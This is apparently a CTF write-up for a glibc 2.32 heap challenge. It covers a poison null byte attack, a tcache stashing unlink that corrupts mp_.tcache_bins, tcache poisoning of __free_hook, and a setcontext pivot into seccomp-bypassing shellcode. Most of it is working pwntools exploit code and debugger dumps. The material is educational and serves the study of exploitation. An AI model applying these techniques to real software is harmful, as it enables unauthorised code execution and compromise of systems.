A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it only had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for controlled arb write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.
Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.
Initial Work:
One thing to note immediately is the patch the author introduced into the glibc library.
By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heapleak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).
An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint_8 to store tcache counts; it now uses uint_16. Hence, if we can place chunks in around the 0x1420ish range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (and the pointer as well). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.
In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.
struct malloc_par | |
{ | |
/* Tunable parameters */ | |
unsigned long trim_threshold; | |
INTERNAL_SIZE_T top_pad; | |
INTERNAL_SIZE_T mmap_threshold; | |
INTERNAL_SIZE_T arena_test; | |
INTERNAL_SIZE_T arena_max; | |
/* Memory map support */ | |
int n_mmaps; | |
int n_mmaps_max; | |
int max_n_mmaps; | |
/* the mmap_threshold is dynamic, until the user sets | |
it manually, at which point we need to disable any | |
dynamic behavior. */ | |
int no_dyn_threshold; | |
/* Statistics */ | |
INTERNAL_SIZE_T mmapped_mem; | |
INTERNAL_SIZE_T max_mmapped_mem; | |
/* First address handed out by MORECORE/sbrk. */ | |
char *sbrk_base; | |
#if USE_TCACHE | |
/* Maximum number of buckets to use. */ | |
size_t tcache_bins; | |
size_t tcache_max_bytes; | |
/* Maximum number of chunks in each bucket. */ | |
size_t tcache_count; | |
/* Maximum number of chunks to remove from the unsorted list, which | |
aren't used to prefill the cache. */ | |
size_t tcache_unsorted_limit; | |
#endif | |
}; |
By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and to bypass the wipe.
Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.
The relevant source for this attack is here:
#if USE_TCACHE | |
/* While we're here, if we see other chunks of the same size, | |
stash them in the tcache. */ | |
size_t tc_idx = csize2tidx (nb); | |
if (tcache && tc_idx < mp_.tcache_bins) | |
{ | |
mchunkptr tc_victim; | |
/* While bin not empty and tcache not full, copy chunks over. */ | |
while (tcache->counts[tc_idx] < mp_.tcache_count | |
&& (tc_victim = last (bin)) != bin) | |
{ | |
if (tc_victim != 0) | |
{ | |
bck = tc_victim->bk; | |
set_inuse_bit_at_offset (tc_victim, nb); | |
if (av != &main_arena) | |
set_non_main_arena (tc_victim); | |
bin->bk = bck; | |
bck->fd = bin; | |
tcache_put (tc_victim, tc_idx); | |
} | |
} | |
} |
Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 tcache bins filled and then 2 smallbins, so you can pull out one smallbin and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.
One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out to bad when writing this exploit as a lot of it just relied on some intuition and checking in a debugger.
Exploit Development:
I recommend closely following around with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.
To start off, I wrote some helper functions:
def wait(): | |
p.recvrepeat(0.1) | |
def alloc(size, data, line=True): | |
assert(size > 0x100 and size <= 0x2000) | |
if len(data) == size: | |
line = False | |
wait() | |
p.sendline('1') | |
wait() | |
p.send(str(size)) | |
wait() | |
if line: | |
p.sendline(data) | |
else: | |
p.send(data) | |
def free(idx): | |
wait() | |
p.sendline('2') | |
wait() | |
p.sendline(str(idx)) | |
def leak(idx): | |
wait() | |
p.sendline('3') | |
wait() | |
p.sendline(str(idx)) | |
def edit(idx, data, line=True): | |
wait() | |
p.sendline('4') | |
wait() | |
p.sendline(str(idx)) | |
wait() | |
if line: | |
p.sendline(data) | |
else: | |
p.send(data) |
Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.
Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted. A chunk larger than all three were requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the one of the middle size has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check.
alloc(0x438, 'A' * 0x438) # 0 | |
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size | |
alloc(0x108, 'test') # 2 | |
alloc(0x438, 'C' * 0x438) # 3, smaller than B | |
alloc(0x108, 'test') # 4 | |
alloc(0x418, 'D' * 0x418) # 5 | |
alloc(0x458, 'E' * 0x458) # 6, bigger than B | |
alloc(0x108, 'test') # 7 | |
free(1) | |
free(3) | |
free(6) | |
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin |
unsortedbin | |
all: 0x0 | |
smallbins | |
empty | |
largebins | |
0x440: 0x55e0675e35c0 —▸ 0x55e0675e26f0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0 |
Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.
Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from | |
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header |
unsortedbin | |
all: 0x55e0675e2720 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2720 | |
smallbins | |
empty | |
largebins | |
0x440: 0x55e0675e35c0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0 | |
pwndbg> x/20gx 0x55e0675e2720-0x50 | |
0x55e0675e26d0: 0x4141414141414141 0x4141414141414141 | |
0x55e0675e26e0: 0x4141414141414141 0x4141414141414141 | |
0x55e0675e26f0: 0x4141414141414141 0x4141414141414141 | |
0x55e0675e2700: 0x4141414141414141 0x0000000000002151 | |
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0 | |
0x55e0675e2720: 0x0000000000000000 0x0000000000000421 | |
0x55e0675e2730: 0x00007f23ee200c00 0x00007f23ee200c00 | |
0x55e0675e2740: 0x0000000000000000 0x0000000000000000 | |
0x55e0675e2750: 0x0000000000000000 0x0000000000000000 | |
0x55e0675e2760: 0x0000000000000000 0x0000000000000000 |
Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range).
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite | |
# 0, 1, 2, 3, 4, 5, 7 | |
# now recover large bins and bring stuff back into unsorted | |
alloc(0x438, 'C' * 0x438) # 6 | |
alloc(0x458, 'E' * 0x458) # 8 | |
# 0, 1, 2, 3, 4, 5, 6, 7, 8 | |
free(6) # unsorted chain | |
free(3) | |
free(8) |
unsortedbin | |
all: 0x55e0675e35c0 —▸ 0x55e0675e2720 —▸ 0x55e0675e2c50 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e35c0 | |
smallbins | |
empty | |
largebins | |
empty | |
pwndbg> x/4gx 0x55e0675e35c0 | |
0x55e0675e35c0: 0x0044444444444444 0x0000000000000461 | |
0x55e0675e35d0: 0x000055e0675e2720 0x00007f23ee200c00 | |
pwndbg> x/4gx 0x55e0675e2720 | |
0x55e0675e2720: 0x0000000000000000 0x0000000000000421 | |
0x55e0675e2730: 0x000055e0675e2c50 0x000055e0675e35c0 | |
pwndbg> x/4gx 0x55e0675e2c50 | |
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441 | |
0x55e0675e2c60: 0x00007f23ee200c00 0x000055e0675e2720 |
Now we want to recover the the 0x440 chunk in unsorted, write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it so the pointers are preserved. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.
free(5) # coalesce in unsorted to get leftover pointers | |
# 0, 1, 2, 4, 7 | |
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata) | |
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted | |
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin | |
# 0, 1, 2, 3, 4, 5, 7 | |
log.info("finished heap massage") |
pwndbg> x/4gx 0x55e0675e2700 | |
0x55e0675e2700: 0x4141414141414141 0x0000000000002151 | |
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0 | |
pwndbg> x/4gx 0x000055e0675e2c50 | |
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441 | |
0x55e0675e2c60: 0x4343434343434343 0x000055e0675e2700 | |
pwndbg> x/4gx 0x000055e0675e35c0 | |
0x55e0675e35c0: 0x4444444444444444 0x0000000000000461 | |
0x55e0675e35d0: 0x000055e0675e2700 0x00007f23ee200c00 |
Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.
I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin | |
alloc(0x430, 'test') # 6 | |
alloc(0x410, 'test') # 8 | |
alloc(0x808, 'G' * 0x808) # 9 | |
alloc(0x4f8, 'H' * 0x4f8) # 10 | |
alloc(0x468, 'temp') # 11 | |
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program) | |
alloc(0x108, 'stash') # 12 | |
alloc(0x108, 'stash') # 13 | |
alloc(0x108, 'stash') # 14 | |
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison | |
alloc(0x108, 'stash') # 16 | |
alloc(0x108, 'stash') # 17 | |
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted | |
free(18) | |
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False) | |
# back coalesce | |
free(10) | |
log.info("achieved backwards coalesce") |
unsortedbin | |
all: 0x55e0675e2700 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2700 | |
smallbins | |
empty | |
largebins | |
empty | |
pwndbg> x/4gx 0x55e0675e2700 | |
0x55e0675e2700: 0x4141414141414141 0x0000000000002651 | |
0x55e0675e2710: 0x00007f23ee200c00 0x00007f23ee200c00 |
Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.
Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.
Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17 | |
# everything from 0 - 9 is overlapped | |
leak(3) | |
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0 | |
log.info('heap base: 0x%x' % heapbase) | |
# libc 2.32 has null ending for main arena + 96 libc address | |
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8 | |
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5 | |
leak(5) | |
libcleak = u64(p.recv(6).ljust(8, '\x00')) | |
libc.address = libcleak - 0x1bf270 | |
log.info('libc base: 0x%x' % libc.address) | |
free(18) | |
free(10) # go back up | |
# fixing index 5 size | |
alloc(0x670, 'test') # 10 | |
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18 | |
# recoalesce it up | |
free(18) | |
free(10) | |
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8 |
A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.
In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:
0x55e06625f520: 0x000055e0675e22c0 0x000055e0675e3b40 S | |
0x55e06625f530: 0x000055e0675e2b50 X 0x000055e0675e2c60 | |
0x55e06625f540: 0x000055e0675e30a0 X 0x000055e0675e31b0 | |
0x55e06625f550: 0x000055e0675e35f0 S 0x000055e0675e3a30 X | |
0x55e06625f560: 0x000055e0675e2730 0x000055e0675e4050 S | |
0x55e06625f570: 0x000055e0675e2710 X 0x000055e0675e4d60 | |
0x55e06625f580: 0x000055e0675e51d0 X 0x000055e0675e52e0 X | |
0x55e06625f590: 0x000055e0675e53f0 X 0x000055e0675e5500 X | |
0x55e06625f5a0: 0x000055e0675e5610 X 0x000055e0675e5720 X | |
0x55e06625f5b0: 0x0000000000000000 |
The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9.
To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.
# coalesce 11 into big unsorted | |
free(11) | |
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later | |
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11 | |
free(11) | |
free(3) | |
# fix index 5 | |
alloc(0x900, '\x00') # 3 | |
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11 | |
free(11) | |
free(3) | |
free(5) | |
# free index 8 now too, could have been done earlier | |
free(8) | |
# fix index 9 to size metadata 0x1511 for potential tcache poison | |
alloc(0x17f0, '\x00') # 3 | |
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct | |
free(5) | |
free(3) | |
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite | |
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3 | |
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5 | |
free(5) | |
free(3) | |
log.info('hopefully cleaned up heap') | |
# get another unsorted | |
free(0) |
Now, I added 5 more 0x110 chunks. This cannot just be done as directly as such. Rather, I performed the allocations (and some frees) in such a way such that the unsorted bin created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that for this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.
One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations | |
alloc(0x108, 'stash') # 0 | |
alloc(0x108, 'stash') # 3 | |
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten) | |
free(5) | |
alloc(0x108, 'temp') # 5 | |
alloc(0x108, 'stash') # 8 | |
# now allocate a big one so next one can overlap with 6 | |
alloc(0xd10, '\x00') # 11 | |
alloc(0x108, 'stash') # 18 | |
free(5) | |
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted |
At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep these number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):
1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)
2. 12 will back coalesce into the large unsorted if not entered into tcache.
3. 0, 3 is a chain
4. 8, 10 is a chain
5. 5 is on top of the big unsorted chunk
6. 2, 4 are isolated
7. 7 has the potential to go into unsorted and merge with a smallbin
8. 18 must be the last one into the smallbin
Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.
free(14) | |
free(16) | |
free(3) | |
free(10) | |
free(5) | |
free(12) | |
free(7) | |
free(17) | |
free(2) | |
free(13) | |
free(15) | |
free(0) | |
free(8) | |
free(4) | |
free(18) | |
# only 1, 6, 9, 11 still left | |
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks | |
free(0) |
Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.
tcachebins | |
empty | |
fastbins | |
0x20: 0x0 | |
0x30: 0x0 | |
0x40: 0x0 | |
0x50: 0x0 | |
0x60: 0x0 | |
0x70: 0x0 | |
0x80: 0x0 | |
unsortedbin | |
all: 0x55e0675e3860 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e3860 | |
smallbins | |
0x110 [corrupted] | |
FD: 0x55e0675e3640 —▸ 0x55e0675e3090 —▸ 0x55e0675e2810 —▸ 0x55e0675e22b0 —▸ 0x55e0675e54f0 ◂— ... | |
BK: 0x55e0675e5710 —▸ 0x55e0675e2b40 —▸ 0x55e0675e52d0 —▸ 0x55e0675e54f0 —▸ 0x55e0675e22b0 ◂— ... | |
largebins | |
empty |
Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.
free(6) | |
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins | |
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk | |
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink | |
log.info('tcache stash unlinked, overwrote mp_.tcache_bin') | |
# can't touch 0x110 smallbin ever again |
tcachebins | |
0x110 [ 7]: 0x55e0675e3650 ◂— 0x55e539584543 | |
fastbins | |
0x20: 0x0 | |
0x30: 0x0 | |
0x40: 0x0 | |
0x50: 0x0 | |
0x60: 0x0 | |
0x70: 0x0 | |
0x80: 0x0 | |
unsortedbin | |
all: 0x0 | |
smallbins | |
0x110 [corrupted] | |
FD: 0x55e0675e3640 ◂— 0x55e539584543 | |
BK: 0x7f23ee2002c0 (mp_+64) ◂— 0x408 | |
largebins | |
0x1800: 0x55e0675e3860 —▸ 0x7f23ee201260 (main_arena+1728) ◂— 0x55e0675e3860 | |
pwndbg> p mp_ | |
$1 = { | |
trim_threshold = 131072, | |
top_pad = 131072, | |
mmap_threshold = 131072, | |
arena_test = 8, | |
arena_max = 0, | |
n_mmaps = 0, | |
n_mmaps_max = 65536, | |
max_n_mmaps = 0, | |
no_dyn_threshold = 0, | |
mmapped_mem = 0, | |
max_mmapped_mem = 0, | |
sbrk_base = 0x55e0675e2000 "", | |
tcache_bins = 139792295660800, | |
tcache_max_bytes = 1032, | |
tcache_count = 7, | |
tcache_unsorted_limit = 0 | |
} |
Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.
Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup) | |
alloc(0x780, '\x00') # 3 | |
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4 | |
free(4) | |
free(9) # created tcache chain | |
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook'] | |
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison |
Now, we must decide on how to escape the seccomp filter. Of course we will need to do an open read write rop chain, however how can we pivot with only control over __free_hook (which implies we have control over rdi)?
One idea that we had was setcontext, which is a well known function to use as a stack pivot.
Dump of assembler code for function setcontext: | |
0x00007f23ee08e520 <+0>: endbr64 | |
0x00007f23ee08e524 <+4>: push rdi | |
0x00007f23ee08e525 <+5>: lea rsi,[rdi+0x128] | |
0x00007f23ee08e52c <+12>: xor edx,edx | |
0x00007f23ee08e52e <+14>: mov edi,0x2 | |
0x00007f23ee08e533 <+19>: mov r10d,0x8 | |
0x00007f23ee08e539 <+25>: mov eax,0xe | |
0x00007f23ee08e53e <+30>: syscall | |
0x00007f23ee08e540 <+32>: pop rdx | |
0x00007f23ee08e541 <+33>: cmp rax,0xfffffffffffff001 | |
0x00007f23ee08e547 <+39>: jae 0x7f23ee08e66f <setcontext+335> | |
0x00007f23ee08e54d <+45>: mov rcx,QWORD PTR [rdx+0xe0] | |
0x00007f23ee08e554 <+52>: fldenv [rcx] | |
0x00007f23ee08e556 <+54>: ldmxcsr DWORD PTR [rdx+0x1c0] | |
0x00007f23ee08e55d <+61>: mov rsp,QWORD PTR [rdx+0xa0] | |
0x00007f23ee08e564 <+68>: mov rbx,QWORD PTR [rdx+0x80] | |
0x00007f23ee08e56b <+75>: mov rbp,QWORD PTR [rdx+0x78] | |
0x00007f23ee08e56f <+79>: mov r12,QWORD PTR [rdx+0x48] | |
0x00007f23ee08e573 <+83>: mov r13,QWORD PTR [rdx+0x50] | |
0x00007f23ee08e577 <+87>: mov r14,QWORD PTR [rdx+0x58] | |
0x00007f23ee08e57b <+91>: mov r15,QWORD PTR [rdx+0x60] |
However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:
mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext undergoes). I went for a mprotect to change heap to rwx, and then pivoted it to shellcode on the heap to open read write exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; | |
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret; | |
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret; | |
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret; | |
alloc(0x1500, '\x00') # 5 | |
alloc(0x1500, p64(super_gadget)) # 6 | |
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget) | |
context(arch='amd64') | |
shellcode = ''' | |
mov rax, 2 | |
mov rdi, %s | |
xor rsi, rsi | |
xor rdx, rdx | |
syscall | |
mov rsi, rdi | |
sub rsi, 0x100 | |
xchg rdi, rax | |
xor rax, rax | |
mov dl, 100 | |
syscall | |
xor rax, rax | |
mov al, 1 | |
mov rdi, 1 | |
syscall | |
mov al, 60 | |
xor rdi, rdi | |
syscall | |
'''% int(heapbase + 0x2920) | |
shellcode = asm(shellcode) | |
